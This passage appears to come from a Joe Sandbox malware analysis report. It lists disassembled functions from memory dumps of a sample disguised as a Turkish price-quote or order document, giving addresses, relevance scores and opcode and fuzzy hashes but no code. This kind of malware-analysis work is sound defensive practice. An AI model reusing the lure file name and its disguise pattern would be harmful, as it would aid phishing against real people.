                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e8574bb861fe0760351f0214e98bd9d6851bfa913e7bfedf60a8b8f9b9f1aea
                                                                                                      • Instruction ID: a707d03ce0473b98f7c445b6e9104de531a996d2eb41cbd3bc3dc0c524460604
                                                                                                      • Opcode Fuzzy Hash: 2e8574bb861fe0760351f0214e98bd9d6851bfa913e7bfedf60a8b8f9b9f1aea
                                                                                                      • Instruction Fuzzy Hash: 87D0173BB400089FCB00CF88F8409DDF7B6FB88220B048417E911A3220CA319821CBA0
                                                                                                      Function 02A16748 Relevance: .0, Instructions: 12COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a6425fd466b0fdec2edb00a85bd70624b00c31a9efac7b2701df597737b37ab
                                                                                                      • Instruction ID: 5ff3ae3ef3fc7ccc44431a834f9eda527abd016d307e349b706fbc31f12287f1
                                                                                                      • Opcode Fuzzy Hash: 7a6425fd466b0fdec2edb00a85bd70624b00c31a9efac7b2701df597737b37ab
                                                                                                      • Instruction Fuzzy Hash: D1C08034C003154BD645F775FC45695335FF7C12047409931B5094D64EFE785D5767A2

                                                                                                      Non-executed Functions

                                                                                                      Function 051B0040 Relevance: .6, Instructions: 596COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21c3386e536127d0e8bbc1170553d2676f1abd7b51bf4537158d1585f16d340c
                                                                                                      • Instruction ID: a1453093833bf892cc9647da2db217e5be92fabd3ecb2c34b213fc4794d8e890
                                                                                                      • Opcode Fuzzy Hash: 21c3386e536127d0e8bbc1170553d2676f1abd7b51bf4537158d1585f16d340c
                                                                                                      • Instruction Fuzzy Hash: C0527C74E01228CFDB64DF65C984BDEBBB2BB89300F1485EAD809A7254DB759E81CF50
                                                                                                      Function 02A1F979 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43af3f78b256fe178f4316d709b4f7345a360cb07854ad06d53401758c84f5da
                                                                                                      • Instruction ID: 3edcbd5fdb4e009316fa983d3344067320742a82d9aaab941252c5ba00f27432
                                                                                                      • Opcode Fuzzy Hash: 43af3f78b256fe178f4316d709b4f7345a360cb07854ad06d53401758c84f5da
                                                                                                      • Instruction Fuzzy Hash: AFC19074E00218CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 0577C558 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 48c0d63c042b6b3e47602adf8ab899b55e173675cf75e6dc6a5d54fbc1eef989
                                                                                                      • Instruction ID: 6748dd28e450b989954c0d840fc1f59176d5cb949e60f6d5e541cad1ee491372
                                                                                                      • Opcode Fuzzy Hash: 48c0d63c042b6b3e47602adf8ab899b55e173675cf75e6dc6a5d54fbc1eef989
                                                                                                      • Instruction Fuzzy Hash: 68D19C78E002188FEB55DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81CF51
                                                                                                      Function 0577E548 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 16e649bc65259f97f1f1b62810d9bc1ae8db6462a736a3193a0fc6b4fd0da443
                                                                                                      • Instruction ID: a8a8a3678e6ef32503d1634464caeaca11033671893ed7f909a95df153d39317
                                                                                                      • Opcode Fuzzy Hash: 16e649bc65259f97f1f1b62810d9bc1ae8db6462a736a3193a0fc6b4fd0da443
                                                                                                      • Instruction Fuzzy Hash: 55D18C78E002188FEB54DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81DF51
                                                                                                      Function 0577C9E8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08c8250a8971d90ed9259e0c6d47bb1bb174cf6ddf248fd0a9dec41ef419a55b
                                                                                                      • Instruction ID: 1db390d101cfb58eef3d99ad489bead788e82ea86fccedad352a2f67f72ba11c
                                                                                                      • Opcode Fuzzy Hash: 08c8250a8971d90ed9259e0c6d47bb1bb174cf6ddf248fd0a9dec41ef419a55b
                                                                                                      • Instruction Fuzzy Hash: 5BD18C78E002188FEB55DFA9D984B9DBBB2FF89300F1081A9D809AB355DB355D81CF51
                                                                                                      Function 0577E9D8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2b6d322d075cbcf14c55d119f3499b030e6f19d92f1e8c8f48b1280e56716bf4
                                                                                                      • Instruction ID: 91e45ea028cbea1df1ad9c73c5c3cc634137dc104612c6e27badb29813d21cbe
                                                                                                      • Opcode Fuzzy Hash: 2b6d322d075cbcf14c55d119f3499b030e6f19d92f1e8c8f48b1280e56716bf4
                                                                                                      • Instruction Fuzzy Hash: 76D18C78E002188FEB54DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81CF51
                                                                                                      Function 0577BC38 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 68296019c1bf29317dc52d2ca92214a93ef9ef948236bd8f7e9fce216df8b18d
                                                                                                      • Instruction ID: 8d1ab78aefd99c4ba6a6883840d4885c36a9586fd1090e55d5b6518686901435
                                                                                                      • Opcode Fuzzy Hash: 68296019c1bf29317dc52d2ca92214a93ef9ef948236bd8f7e9fce216df8b18d
                                                                                                      • Instruction Fuzzy Hash: 83D18D78E002188FDB54DFA9D984B9DBBB2FF89300F1081A9D809AB355DB355E81DF51
                                                                                                      Function 0577DC28 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 861bc1a67a91aa17134bab482dd0ba51b757768ae71ebbce8f44c87c6f08a21e
                                                                                                      • Instruction ID: eda9ca0a262a556d27463fe6cdcb953c08d5f88a1af22dd154587103b502f30e
                                                                                                      • Opcode Fuzzy Hash: 861bc1a67a91aa17134bab482dd0ba51b757768ae71ebbce8f44c87c6f08a21e
                                                                                                      • Instruction Fuzzy Hash: 05D18D78E002188FDB54DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81DF51
                                                                                                      Function 0577C0C8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0beb320d06b49269b5c8c0a0ea6659292d02260597b75bed82cc7ce2a7d71a91
                                                                                                      • Instruction ID: 9a1d79e489b0658db7cc12a65d6751b7586d2a4f4c55100d29419a0b51135a76
                                                                                                      • Opcode Fuzzy Hash: 0beb320d06b49269b5c8c0a0ea6659292d02260597b75bed82cc7ce2a7d71a91
                                                                                                      • Instruction Fuzzy Hash: 24D19D78E002188FEB55DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81CF51
                                                                                                      Function 0577E0B8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 16e649bc65259f97f1f1b62810d9bc1ae8db6462a736a3193a0fc6b4fd0da443
                                                                                                      • Instruction ID: 63918ec18d4deb5f6e55aad98a9eea1f6fe6d4a73aa317b51ddd99be7effa1fd
                                                                                                      • Opcode Fuzzy Hash: 16e649bc65259f97f1f1b62810d9bc1ae8db6462a736a3193a0fc6b4fd0da443
                                                                                                      • Instruction Fuzzy Hash: CBD18C78E002188FEB54DFA9D984B9DBBB2FF89300F2081A9D809AB355DB355D81DF51
                                                                                                      Function 0577D308 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be6542919c7d48c851e2ccaaf24cdf7c9be7d8600118f266c0ab754a6cf0c6f3
                                                                                                      • Instruction ID: d3e3a9c64848976da4383dc022ef29baf2d5e9539e48860c6e330466da4dc1df
                                                                                                      • Opcode Fuzzy Hash: be6542919c7d48c851e2ccaaf24cdf7c9be7d8600118f266c0ab754a6cf0c6f3
                                                                                                      • Instruction Fuzzy Hash: FDD19C78E002188FDB64DFA9D984B9DBBB2FF89300F1081A9D809AB355DB355D81CF51
                                                                                                      Function 0577B7A8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53fefe60b78b61dd730682d978a94ea528e7c2c76aaabf07f4e806384a18cc57
                                                                                                      • Instruction ID: e049f70d6c3acf2954eed62094637639fd2dff28cc079d0482f74b12139db889
                                                                                                      • Opcode Fuzzy Hash: 53fefe60b78b61dd730682d978a94ea528e7c2c76aaabf07f4e806384a18cc57
                                                                                                      • Instruction Fuzzy Hash: 60D18C78E002188FEB54DFA9D994B9DBBB2FF89300F2080A9D809AB355DB355D81CF51
                                                                                                      Function 0577D798 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9f0defd91da6e24a79b67269393269b631b89230842855a6fcf02128ce0b06ec
                                                                                                      • Instruction ID: eaa61f98d04f51eece00e1869d1091436c1df7e8d5e4be5d060f5abc8097057e
                                                                                                      • Opcode Fuzzy Hash: 9f0defd91da6e24a79b67269393269b631b89230842855a6fcf02128ce0b06ec
                                                                                                      • Instruction Fuzzy Hash: F3D18D78E002188FDB64DFA9D994B9DBBB2FF89300F1081A9D809AB355DB355E81CF51
                                                                                                      Function 0577F788 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 979dac2da6adde8e549fae06383ecd19fdcb05adee6f2fd4593e6a42b72e4522
                                                                                                      • Instruction ID: 7851156b7163367872c0b7aeef97802b505f16b9da331ded8885f3bb4a4f0b45
                                                                                                      • Opcode Fuzzy Hash: 979dac2da6adde8e549fae06383ecd19fdcb05adee6f2fd4593e6a42b72e4522
                                                                                                      • Instruction Fuzzy Hash: 6FD18C78E002188FDB54DFA9D994B9DBBB2EF89300F2081A9D809AB355DB355D81CF51
                                                                                                      Function 0577CE78 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4fec2bb34f0338dc2d97c32981a79ee27bd7cc8941fff93b927e46730f4e467b
                                                                                                      • Instruction ID: 8fdb73cf790b3dc24e9a050f5554a0dc402eb972ce095d7816df342331dd5e7f
                                                                                                      • Opcode Fuzzy Hash: 4fec2bb34f0338dc2d97c32981a79ee27bd7cc8941fff93b927e46730f4e467b
                                                                                                      • Instruction Fuzzy Hash: 54D18E78E002188FDB54DFA9D994B9DBBB2FF89300F1080A9D809AB355DB355D82CF51
                                                                                                      Function 0577EE68 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 19881d0f0290a59de64aa377b68c0712d8df918516dbaf88902ee8222d3c9145
                                                                                                      • Instruction ID: 4ad8ac018387caa2c3fb04dcb670d95682510682c756f98144648168a5208812
                                                                                                      • Opcode Fuzzy Hash: 19881d0f0290a59de64aa377b68c0712d8df918516dbaf88902ee8222d3c9145
                                                                                                      • Instruction Fuzzy Hash: 33D18C78E002188FEB54DFA9D994B9DBBB2FF89300F2080A9D809AB355DB355D81DF51
                                                                                                      Function 0577F2F8 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03338098f6e1cf2b9beb352851933cdb63c1d34cdfb521f6acaad7c835b6b0ce
                                                                                                      • Instruction ID: 4f05a822f0a30112b4ff45a5a2974815374350e2238fe9b32485edbef3b065b6
                                                                                                      • Opcode Fuzzy Hash: 03338098f6e1cf2b9beb352851933cdb63c1d34cdfb521f6acaad7c835b6b0ce
                                                                                                      • Instruction Fuzzy Hash: E4D18D78E002188FDB54DFA9D984B9DBBB2FF89300F1080A9D809AB355DB355D81CF51
                                                                                                      Function 051BD550 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 7e5e66e9d2a18dbed24f702967509a9b61a9682c910a8a4b7b084e33545346f7
                                                                                                      • Instruction ID: 3800f80602e87e82ac04cf1954916a50836433fdcc5f9613b8c3f9ebd62a6834
                                                                                                      • Opcode Fuzzy Hash: 7e5e66e9d2a18dbed24f702967509a9b61a9682c910a8a4b7b084e33545346f7
                                                                                                      • Instruction Fuzzy Hash: 1AC18074E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 051BD9A8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: c3d315fb1fbb86e99dfc4afe199822debc69aa52cf426cbbf0a69f1e5daa1b02
                                                                                                      • Instruction ID: 5b3817e25d66300602b9231dcf6660851f075016d890516ea89f6fe69fd6ceb5
                                                                                                      • Opcode Fuzzy Hash: c3d315fb1fbb86e99dfc4afe199822debc69aa52cf426cbbf0a69f1e5daa1b02
                                                                                                      • Instruction Fuzzy Hash: DBC19274E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB355E81CF50
                                                                                                      Function 051BF810 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: bd4c05ae7471a9ecc226e8c6d3b76e2b324f6f9688ecdb3683c255dfe05547bf
                                                                                                      • Instruction ID: 418796eb5a560101c1b92fa6fb7b56246d77304012f702832efabea8bdb49ab2
                                                                                                      • Opcode Fuzzy Hash: bd4c05ae7471a9ecc226e8c6d3b76e2b324f6f9688ecdb3683c255dfe05547bf
                                                                                                      • Instruction Fuzzy Hash: 42C18174E00218CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB355E85CF50
                                                                                                      Function 051BCCA0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: de6e1ac0ac79f345837c401953ec0989a657e164389b62f53c649b5938176e86
                                                                                                      • Instruction ID: d66ae3297df2439b02193e32119122896759cd576a91cfd228540c0a54990f7f
                                                                                                      • Opcode Fuzzy Hash: de6e1ac0ac79f345837c401953ec0989a657e164389b62f53c649b5938176e86
                                                                                                      • Instruction Fuzzy Hash: FDC19174E00218CFEB54DFA9C994B9DBBB2BF89304F2081A9D809AB355DB355E81CF50
                                                                                                      Function 051BD0F8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: c862ea32e01c6051d23483cd5b211d1376969d3355147d2c2d404b864146baad
                                                                                                      • Instruction ID: aba2d3fa0d2e44f57722e6c9c69ded62a76cb97265371d257c021d4ccc462e0d
                                                                                                      • Opcode Fuzzy Hash: c862ea32e01c6051d23483cd5b211d1376969d3355147d2c2d404b864146baad
                                                                                                      • Instruction Fuzzy Hash: AAC19274E00218CFEB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB355E81CF50
                                                                                                      Function 051BEB08 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 0a6cccad648bc48b0dced744e4841bba60f9bbd2f1785b1ce7fca9cfea07309a
                                                                                                      • Instruction ID: 168d45104c2394627eda863909bfd1f5572320049d39aaa2fc84ba1ef38481a3
                                                                                                      • Opcode Fuzzy Hash: 0a6cccad648bc48b0dced744e4841bba60f9bbd2f1785b1ce7fca9cfea07309a
                                                                                                      • Instruction Fuzzy Hash: DAC17E74E00218CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB759E81CF50
                                                                                                      Function 051BEF60 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 860b846c61ee88879d1e93058e2bb78e429489c7d105b7aad5c435076435ca69
                                                                                                      • Instruction ID: d06486277bdb99ed24e26d1a638f2a297444f53b0e221c32fe756876af713e1d
                                                                                                      • Opcode Fuzzy Hash: 860b846c61ee88879d1e93058e2bb78e429489c7d105b7aad5c435076435ca69
                                                                                                      • Instruction Fuzzy Hash: CCC18174E00218CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB359E85CF50
                                                                                                      Function 051BF3B8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 3e6e1ef949d53ca30873118ed8e030d7f543ba262dea06b529c52d78208fea85
                                                                                                      • Instruction ID: 07e78b041e38ea44ceb4b45b15f3a961cd7d64aea80d9175a7ff0dbc77752566
                                                                                                      • Opcode Fuzzy Hash: 3e6e1ef949d53ca30873118ed8e030d7f543ba262dea06b529c52d78208fea85
                                                                                                      • Instruction Fuzzy Hash: 4AC18174E00218CFEB54EFA5C994B9DBBB2BF89304F2081A9D809AB355DB355E85CF50
                                                                                                      Function 051BE258 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
